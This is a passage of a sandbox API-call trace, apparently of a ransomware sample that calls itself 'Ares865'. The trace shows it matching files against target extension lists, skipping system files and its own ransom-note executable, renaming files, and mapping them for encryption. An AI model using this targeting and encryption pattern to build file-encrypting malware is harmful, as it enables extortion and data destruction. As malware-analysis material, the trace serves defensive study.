(lpString1="x_dll", lpString2="accdt") returned 1 [0088.372] lstrlenW (lpString="accdw") returned 5 [0088.372] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.372] lstrlenW (lpString="accft") returned 5 [0088.372] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.372] lstrlenW (lpString="adb") returned 3 [0088.372] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.372] lstrlenW (lpString="adb") returned 3 [0088.372] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.372] lstrlenW (lpString="ade") returned 3 [0088.372] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.372] lstrlenW (lpString="adf") returned 3 [0088.372] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.372] lstrlenW (lpString="adn") returned 3 [0088.372] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.372] lstrlenW (lpString="adp") returned 3 [0088.372] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.373] lstrlenW (lpString="alf") returned 3 [0088.373] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.373] lstrlenW (lpString="ask") returned 3 [0088.373] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.373] lstrlenW (lpString="btr") returned 3 [0088.373] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.373] lstrlenW (lpString="cat") returned 3 [0088.373] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.373] lstrlenW (lpString="cdb") returned 3 [0088.373] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.373] lstrlenW (lpString="ckp") returned 3 [0088.373] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.373] lstrlenW (lpString="cma") returned 3 [0088.373] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.373] lstrlenW (lpString="cpd") returned 3 [0088.373] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.373] lstrlenW (lpString="dacpac") returned 6 [0088.373] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.373] lstrlenW (lpString="dad") returned 3 [0088.373] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.373] lstrlenW (lpString="dadiagrams") returned 10 [0088.373] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0088.373] lstrlenW (lpString="daschema") returned 8 [0088.373] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.373] lstrlenW (lpString="db-journal") returned 10 [0088.373] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0088.373] lstrlenW (lpString="db-shm") returned 6 [0088.373] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.373] lstrlenW (lpString="db-wal") returned 6 [0088.373] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.373] lstrlenW (lpString="dbc") returned 3 [0088.373] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.373] lstrlenW (lpString="dbs") returned 3 [0088.373] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.373] lstrlenW (lpString="dbt") returned 3 [0088.373] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.373] lstrlenW (lpString="dbv") returned 3 [0088.373] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.374] lstrlenW (lpString="dbx") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.374] lstrlenW (lpString="dcb") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.374] lstrlenW (lpString="dct") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.374] lstrlenW (lpString="dcx") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.374] lstrlenW (lpString="ddl") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.374] lstrlenW (lpString="dlis") returned 4 [0088.374] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.374] lstrlenW (lpString="dp1") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.374] lstrlenW (lpString="dqy") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.374] lstrlenW (lpString="dsk") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.374] lstrlenW (lpString="dsn") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.374] lstrlenW (lpString="dtsx") returned 4 [0088.374] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.374] lstrlenW (lpString="dxl") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.374] lstrlenW (lpString="eco") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.374] lstrlenW (lpString="ecx") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.374] lstrlenW (lpString="edb") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.374] lstrlenW (lpString="epim") returned 4 [0088.374] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.374] lstrlenW (lpString="fcd") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.374] lstrlenW (lpString="fdb") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.374] lstrlenW (lpString="fic") returned 3 [0088.374] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.375] lstrlenW (lpString="flexolibrary") returned 12 [0088.375] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0088.375] lstrlenW (lpString="fm5") returned 3 [0088.375] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.375] lstrlenW (lpString="fmp") returned 3 [0088.375] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.375] lstrlenW (lpString="fmp12") returned 5 [0088.375] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.375] lstrlenW (lpString="fmpsl") returned 5 [0088.375] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.375] lstrlenW (lpString="fol") returned 3 [0088.375] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.375] lstrlenW (lpString="fp3") returned 3 [0088.375] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.375] lstrlenW (lpString="fp4") returned 3 [0088.375] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.375] lstrlenW (lpString="fp5") returned 3 [0088.375] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.375] lstrlenW (lpString="fp7") returned 3 [0088.375] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.375] lstrlenW (lpString="fpt") returned 3 [0088.375] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.375] lstrlenW (lpString="frm") returned 3 [0088.375] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.375] lstrlenW (lpString="gdb") returned 3 [0088.375] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.375] lstrlenW (lpString="gdb") returned 3 [0088.375] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.375] lstrlenW (lpString="grdb") returned 4 [0088.375] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.375] lstrlenW (lpString="gwi") returned 3 [0088.375] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.375] lstrlenW (lpString="hdb") returned 3 [0088.375] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.375] lstrlenW (lpString="his") returned 3 [0088.375] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.375] lstrlenW (lpString="ib") returned 2 [0088.375] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.376] lstrlenW (lpString="idb") returned 3 [0088.376] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.376] lstrlenW (lpString="ihx") returned 3 [0088.376] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.376] lstrlenW (lpString="itdb") returned 4 [0088.376] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.376] lstrlenW (lpString="itw") returned 3 [0088.376] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.376] lstrlenW (lpString="jet") returned 3 [0088.376] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.376] lstrlenW (lpString="jtx") returned 3 [0088.376] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.376] lstrlenW (lpString="kdb") returned 3 [0088.376] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.376] lstrlenW (lpString="kexi") returned 4 [0088.376] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.376] lstrlenW (lpString="kexic") returned 5 [0088.376] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.376] lstrlenW (lpString="kexis") returned 5 [0088.376] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.376] lstrlenW (lpString="lgc") returned 3 [0088.376] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.376] lstrlenW (lpString="lwx") returned 3 [0088.376] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.376] lstrlenW (lpString="maf") returned 3 [0088.376] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.376] lstrlenW (lpString="maq") returned 3 [0088.376] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.376] lstrlenW (lpString="mar") returned 3 [0088.376] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.376] lstrlenW (lpString="marshal") returned 7 [0088.376] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.376] lstrlenW (lpString="mas") returned 3 [0088.376] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.376] lstrlenW (lpString="mav") returned 3 [0088.376] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.376] lstrlenW (lpString="maw") returned 3 [0088.376] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.377] lstrlenW (lpString="mdbhtml") returned 7 [0088.377] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.377] lstrlenW (lpString="mdn") returned 3 [0088.377] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.377] lstrlenW (lpString="mdt") returned 3 [0088.377] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.377] lstrlenW (lpString="mfd") returned 3 [0088.377] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.377] lstrlenW (lpString="mpd") returned 3 [0088.377] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.377] lstrlenW (lpString="mrg") returned 3 [0088.377] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.377] lstrlenW (lpString="mud") returned 3 [0088.377] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.377] lstrlenW (lpString="mwb") returned 3 [0088.377] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.377] lstrlenW (lpString="myd") returned 3 [0088.377] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.377] lstrlenW (lpString="ndf") returned 3 [0088.377] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.377] lstrlenW (lpString="nnt") returned 3 [0088.377] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.377] lstrlenW (lpString="nrmlib") returned 6 [0088.377] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.377] lstrlenW (lpString="ns2") returned 3 [0088.377] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.377] lstrlenW (lpString="ns3") returned 3 [0088.377] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.377] lstrlenW (lpString="ns4") returned 3 [0088.377] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.377] lstrlenW (lpString="nsf") returned 3 [0088.377] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.377] lstrlenW (lpString="nv") returned 2 [0088.377] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.377] lstrlenW (lpString="nv2") returned 3 [0088.377] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.377] lstrlenW (lpString="nwdb") returned 4 [0088.377] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.378] lstrlenW (lpString="nyf") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.378] lstrlenW (lpString="odb") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.378] lstrlenW (lpString="odb") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.378] lstrlenW (lpString="oqy") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.378] lstrlenW (lpString="ora") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.378] lstrlenW (lpString="orx") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.378] lstrlenW (lpString="owc") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.378] lstrlenW (lpString="p96") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.378] lstrlenW (lpString="p97") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.378] lstrlenW (lpString="pan") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.378] lstrlenW (lpString="pdb") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.378] lstrlenW (lpString="pdm") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.378] lstrlenW (lpString="pnz") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.378] lstrlenW (lpString="qry") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.378] lstrlenW (lpString="qvd") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.378] lstrlenW (lpString="rbf") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.378] lstrlenW (lpString="rctd") returned 4 [0088.378] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.378] lstrlenW (lpString="rod") returned 3 [0088.378] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.378] lstrlenW (lpString="rodx") returned 4 [0088.379] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.379] lstrlenW (lpString="rpd") returned 3 [0088.379] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.379] lstrlenW (lpString="rsd") returned 3 [0088.379] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.379] lstrlenW (lpString="sas7bdat") returned 8 [0088.379] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.379] lstrlenW (lpString="sbf") returned 3 [0088.379] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.379] lstrlenW (lpString="scx") returned 3 [0088.379] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.379] lstrlenW (lpString="sdb") returned 3 [0088.379] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.379] lstrlenW (lpString="sdc") returned 3 [0088.379] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.379] lstrlenW (lpString="sdf") returned 3 [0088.379] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.379] lstrlenW (lpString="sis") returned 3 [0088.379] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.379] lstrlenW (lpString="spq") returned 3 [0088.379] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.379] lstrlenW (lpString="te") returned 2 [0088.379] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.379] lstrlenW (lpString="teacher") returned 7 [0088.379] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.379] lstrlenW (lpString="tmd") returned 3 [0088.379] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.379] lstrlenW (lpString="tps") returned 3 [0088.379] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.379] lstrlenW (lpString="trc") returned 3 [0088.379] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.379] lstrlenW (lpString="trc") returned 3 [0088.379] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.379] lstrlenW (lpString="trm") returned 3 [0088.379] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.379] lstrlenW (lpString="udb") returned 3 [0088.379] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.379] lstrlenW (lpString="udl") returned 3 [0088.380] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.380] lstrlenW (lpString="usr") returned 3 [0088.380] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.380] lstrlenW (lpString="v12") returned 3 [0088.380] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.380] lstrlenW (lpString="vis") returned 3 [0088.380] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.380] lstrlenW (lpString="vpd") returned 3 [0088.380] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.380] lstrlenW (lpString="vvv") returned 3 [0088.380] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.380] lstrlenW (lpString="wdb") returned 3 [0088.380] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.380] lstrlenW (lpString="wmdb") returned 4 [0088.380] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.380] lstrlenW (lpString="wrk") returned 3 [0088.380] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.380] lstrlenW (lpString="xdb") returned 3 [0088.380] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.380] lstrlenW (lpString="xld") returned 3 [0088.380] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.380] lstrlenW (lpString="xmlff") returned 5 [0088.380] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.380] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.Ares865") returned 77 [0088.380] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.381] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.381] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13152) returned 1 [0088.382] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.382] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.382] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.382] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.383] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.383] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.383] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3660, lpName=0x0) returned 0x15c [0088.385] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3660) returned 0x190000 [0088.386] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.387] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.387] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.387] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0088.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0088.387] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.387] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0088.388] CloseHandle (hObject=0x15c) returned 1 [0088.388] CloseHandle (hObject=0x118) returned 1 [0088.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.388] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8e7d800, ftCreationTime.dwHighDateTime=0x1cac7f6, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xc8e7d800, ftLastWriteTime.dwHighDateTime=0x1cac7f6, nFileSizeHigh=0x0, nFileSizeLow=0x4160, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="STINTL.DLL.trx_dll", cAlternateFileName="STINTL~1.TRX")) returned 1 [0088.388] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.388] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.388] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2=".") returned 1 [0088.388] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="..") returned 1 [0088.388] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="windows") returned -1 [0088.388] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0088.388] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="temp") returned -1 [0088.388] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0088.388] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="boot") returned 1 [0088.388] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0088.388] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0088.388] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="perflogs") returned 1 [0088.388] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0088.388] lstrlenW (lpString="STINTL.DLL.trx_dll") returned 18 [0088.388] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll") returned 69 [0088.388] lstrcpyW (in: lpString1=0x2cce468, lpString2="STINTL.DLL.trx_dll" | out: lpString1="STINTL.DLL.trx_dll") returned="STINTL.DLL.trx_dll" [0088.388] lstrlenW (lpString="STINTL.DLL.trx_dll") returned 18 [0088.388] lstrlenW (lpString="Ares865") returned 7 [0088.388] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.389] lstrlenW (lpString=".dll") returned 4 [0088.389] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2=".dll") returned 1 [0088.389] lstrlenW (lpString=".lnk") returned 4 [0088.389] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0088.389] lstrlenW (lpString=".ini") returned 4 [0088.389] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2=".ini") returned 1 [0088.389] lstrlenW (lpString=".sys") returned 4 [0088.389] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2=".sys") returned 1 [0088.389] lstrlenW (lpString="STINTL.DLL.trx_dll") returned 18 [0088.389] lstrlenW (lpString="bak") returned 3 [0088.389] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.389] lstrlenW (lpString="ba_") returned 3 [0088.389] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.389] lstrlenW (lpString="dbb") returned 3 [0088.389] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.389] lstrlenW (lpString="vmdk") returned 4 [0088.389] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.389] lstrlenW (lpString="rar") returned 3 [0088.389] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.389] lstrlenW (lpString="zip") returned 3 [0088.389] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.389] lstrlenW (lpString="tgz") returned 3 [0088.389] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.389] lstrlenW (lpString="vbox") returned 4 [0088.389] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.389] lstrlenW (lpString="vdi") returned 3 [0088.389] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.389] lstrlenW (lpString="vhd") returned 3 [0088.389] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.389] lstrlenW (lpString="vhdx") returned 4 [0088.389] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.389] lstrlenW (lpString="avhd") returned 4 [0088.389] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.389] lstrlenW (lpString="db") returned 2 [0088.389] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.389] lstrlenW (lpString="db2") returned 3 [0088.389] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.390] lstrlenW (lpString="db3") returned 3 [0088.390] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.390] lstrlenW (lpString="dbf") returned 3 [0088.390] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.390] lstrlenW (lpString="mdf") returned 3 [0088.390] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.390] lstrlenW (lpString="mdb") returned 3 [0088.390] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.390] lstrlenW (lpString="sql") returned 3 [0088.390] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.390] lstrlenW (lpString="sqlite") returned 6 [0088.390] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.390] lstrlenW (lpString="sqlite3") returned 7 [0088.390] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.390] lstrlenW (lpString="sqlitedb") 